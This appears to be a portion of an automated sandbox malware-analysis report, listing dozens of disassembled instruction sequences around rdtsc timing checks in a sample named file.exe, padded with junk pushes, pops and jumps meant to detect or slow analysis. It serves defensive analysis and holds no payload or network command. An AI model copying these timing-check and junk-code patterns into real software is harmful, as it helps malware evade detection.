                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D27D8 second address: 5D281A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A53Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or dword ptr [ebp+122D17F8h], eax 0x00000012 push 00000004h 0x00000014 mov edi, dword ptr [ebp+122D2EFCh] 0x0000001a nop 0x0000001b push ecx 0x0000001c push ecx 0x0000001d jng 00007FBE44D3A536h 0x00000023 pop ecx 0x00000024 pop ecx 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FBE44D3A544h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624FA7 second address: 624FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnl 00007FBE444F40A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624FB3 second address: 624FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624FB7 second address: 624FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624FC1 second address: 624FC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624FC5 second address: 624FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625112 second address: 625119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625B45 second address: 625B75 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBE444F40A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FBE444F40A8h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBE444F40B4h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625B75 second address: 625B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629C2E second address: 629C50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40B8h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629157 second address: 629172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A541h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629172 second address: 629178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629178 second address: 62917C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62917C second address: 62919A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBE444F40A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007FBE444F40AEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62919A second address: 62919E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62946E second address: 629476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629476 second address: 62948F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBE44D3A536h 0x0000000a popad 0x0000000b jno 00007FBE44D3A53Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629603 second address: 629609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629609 second address: 629620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44D3A53Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FC5C second address: 62FC64 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FC64 second address: 62FC85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBE44D3A541h 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007FBE44D3A536h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FC85 second address: 62FC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FC8B second address: 62FC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630136 second address: 630144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63043F second address: 63045D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FBE44D3A536h 0x0000000b jp 00007FBE44D3A536h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBE44D3A53Ah 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630713 second address: 630721 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FBE444F40B2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630A32 second address: 630A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630D01 second address: 630D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6315AF second address: 6315B9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBE44D3A53Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6315B9 second address: 6315C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6315C4 second address: 6315C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6318CE second address: 6318E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE444F40AFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6318E1 second address: 6318E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637884 second address: 6378A1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FBE444F40B2h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6378A1 second address: 6378C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jmp 00007FBE44D3A549h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6378C3 second address: 6378C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A7AF second address: 63A7B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63AFDC second address: 63AFE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63AFE2 second address: 63AFE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63AFE6 second address: 63B009 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FBE444F40B9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B009 second address: 63B026 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A549h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B1AC second address: 63B1F3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007FBE444F40A6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FBE444F40DEh 0x00000014 push edx 0x00000015 jnl 00007FBE444F40A6h 0x0000001b pushad 0x0000001c popad 0x0000001d pop edx 0x0000001e pushad 0x0000001f jmp 00007FBE444F40B4h 0x00000024 jmp 00007FBE444F40B2h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E4AE second address: 63E4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44D3A544h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E4CD second address: 63E4D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E4D1 second address: 63E4F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBE44D3A536h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FBE44D3A53Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FBE44D3A536h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63E4F0 second address: 63E4F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5932E2 second address: 5932ED instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 643EBC second address: 643ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE444F40B1h 0x00000009 jl 00007FBE444F40A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 643ED9 second address: 643EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 644352 second address: 644358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6446D2 second address: 6446D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 644B4F second address: 644B99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FBE444F40BCh 0x0000000f push eax 0x00000010 jmp 00007FBE444F40B0h 0x00000015 jmp 00007FBE444F40B3h 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 644D03 second address: 644D0D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBE44D3A536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 644E6B second address: 644E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 644E71 second address: 644E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FBE44D3A53Ah 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 644E81 second address: 644E86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 644E86 second address: 644E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64B752 second address: 64B75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FBE444F40A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64DB70 second address: 64DB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64DB7A second address: 64DB98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64DA16 second address: 64DA1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65A755 second address: 65A759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65A759 second address: 65A774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FBE44D3A53Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007FBE44D3A538h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65CC1B second address: 65CC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65CC22 second address: 65CC38 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBE44D3A53Ch 0x00000008 jp 00007FBE44D3A536h 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007FBE44D3A536h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65C716 second address: 65C74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jno 00007FBE444F40A6h 0x0000000c jns 00007FBE444F40A6h 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 jmp 00007FBE444F40B9h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65C74D second address: 65C753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65C753 second address: 65C757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65C757 second address: 65C779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBE44D3A536h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FBE44D3A546h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65C779 second address: 65C7A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FBE444F40A6h 0x00000009 jmp 00007FBE444F40B8h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65C906 second address: 65C90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66A6A9 second address: 66A6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66A6AD second address: 66A6D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FBE44D3A53Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FBE44D3A547h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6724CE second address: 6724D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 670EE5 second address: 670F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FBE44D3A53Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 670F02 second address: 670F0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 670F0B second address: 670F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBE44D3A536h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBE44D3A543h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 670F2D second address: 670F3B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FBE444F40A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6711A4 second address: 6711BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A542h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 671682 second address: 671689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67218F second address: 672198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 676D4D second address: 676D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 676D55 second address: 676D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 676D5C second address: 676D67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FBE444F40A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6798DD second address: 6798E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6794B8 second address: 6794C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBE444F40ACh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6930E1 second address: 6930FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A542h 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FBE44D3A536h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 693259 second address: 69326E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FBE444F40ABh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69326E second address: 69328F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44D3A547h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69328F second address: 693295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 693295 second address: 69329A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A1E94 second address: 6A1E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A1E98 second address: 6A1E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A1E9E second address: 6A1EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBE444F40AEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A1EB4 second address: 6A1ECC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push edi 0x00000008 push edx 0x00000009 jmp 00007FBE44D3A53Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A5A9C second address: 6A5AA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A5D9D second address: 6A5DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44D3A547h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A5DBE second address: 6A5DC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A5DC2 second address: 6A5DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AC0EA second address: 6AC0F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
